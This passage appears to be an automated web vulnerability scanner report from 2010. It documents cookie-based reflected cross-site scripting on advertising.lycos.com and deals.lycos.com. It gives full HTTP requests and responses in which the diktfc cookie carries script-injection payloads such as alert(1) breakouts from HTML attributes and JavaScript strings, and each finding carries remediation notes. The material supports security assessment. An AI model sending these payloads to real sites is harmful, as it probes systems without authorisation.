Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: advertising.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad7045"><script>alert(1)</script>e23721f874e; PENTA=174.121.222.18.1292163892141045
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:26:49 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:49 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Advertise@L ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=advertising.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad7045"><script>alert(1)</script>e23721f874e.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8531"%3balert(1)//6adf9a53388 was submitted in the diktfc cookie. This input was echoed as d8531";alert(1)//6adf9a53388 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bootstrap.js HTTP/1.1 Host: advertising.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad8531"%3balert(1)//6adf9a53388; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:27:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:14 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15464
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ebb"><script>alert(1)</script>473ae392abf was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bootstrap.js HTTP/1.1 Host: advertising.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86ebb"><script>alert(1)</script>473ae392abf; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:27:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:13 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15494
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Advertise@L ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=advertising.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86ebb"><script>alert(1)</script>473ae392abf.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73b5d"%3balert(1)//fbdd08a21ac was submitted in the diktfc cookie. This input was echoed as 73b5d";alert(1)//fbdd08a21ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contactus.html HTTP/1.1 Host: advertising.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A73b5d"%3balert(1)//fbdd08a21ac; PENTA=174.121.222.18.1292163890688109
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:26:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:56 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15452
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f719d"><script>alert(1)</script>1c833ec0851 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /contactus.html HTTP/1.1 Host: advertising.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af719d"><script>alert(1)</script>1c833ec0851; PENTA=174.121.222.18.1292163890688109
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:26:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:55 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Advertise@L ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=advertising.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af719d"><script>alert(1)</script>1c833ec0851.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad8cc"%3balert(1)//75d1be7661c was submitted in the diktfc cookie. This input was echoed as ad8cc";alert(1)//75d1be7661c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lycos.xml HTTP/1.1 Host: advertising.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad8cc"%3balert(1)//75d1be7661c; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:27:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:16 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15461
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 532cd"><script>alert(1)</script>325056d76aa was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /lycos.xml HTTP/1.1 Host: advertising.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A532cd"><script>alert(1)</script>325056d76aa; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:27:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:16 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15491
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Advertise@L ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=advertising.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A532cd"><script>alert(1)</script>325056d76aa.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97ccd"%3balert(1)//96aec635ab1 was submitted in the diktfc cookie. This input was echoed as 97ccd";alert(1)//96aec635ab1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?utm_source=lycoshome&utm_campaign=home_deals&utm_medium=right_module HTTP/1.1 Host: deals.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2; displayMobile=0; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A97ccd"%3balert(1)//96aec635ab1
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:28:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:30 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 87695
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4848d"><script>alert(1)</script>8271264fa99 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?utm_source=lycoshome&utm_campaign=home_deals&utm_medium=right_module HTTP/1.1 Host: deals.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2; displayMobile=0; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4848d"><script>alert(1)</script>8271264fa99
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:28:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:28 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 87725
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4848d"><script>alert(1)</script>8271264fa99&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3373"%3balert(1)//cb851bc2ef was submitted in the diktfc cookie. This input was echoed as a3373";alert(1)//cb851bc2ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bootstrap.js HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa3373"%3balert(1)//cb851bc2ef; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:33:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:27 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 12888
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b481"><script>alert(1)</script>a5c183e28ee was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bootstrap.js HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b481"><script>alert(1)</script>a5c183e28ee; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:33:26 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:26 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 12920
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/bootstrap.js&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b481"><script>alert(1)</script>a5c183e28ee&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a25a4"%3balert(1)//d3e20f2e46f was submitted in the diktfc cookie. This input was echoed as a25a4";alert(1)//d3e20f2e46f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coupons HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa25a4"%3balert(1)//d3e20f2e46f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:34 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 42885
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91ede"><script>alert(1)</script>07af65f492e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /coupons HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A91ede"><script>alert(1)</script>07af65f492e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:32 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:32 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 42909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/coupons&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A91ede"><script>alert(1)</script>07af65f492e&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 891ef"><script>alert(1)</script>40c20ce42a6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /coupons/stores HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A891ef"><script>alert(1)</script>40c20ce42a6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:31 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:31 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 74634
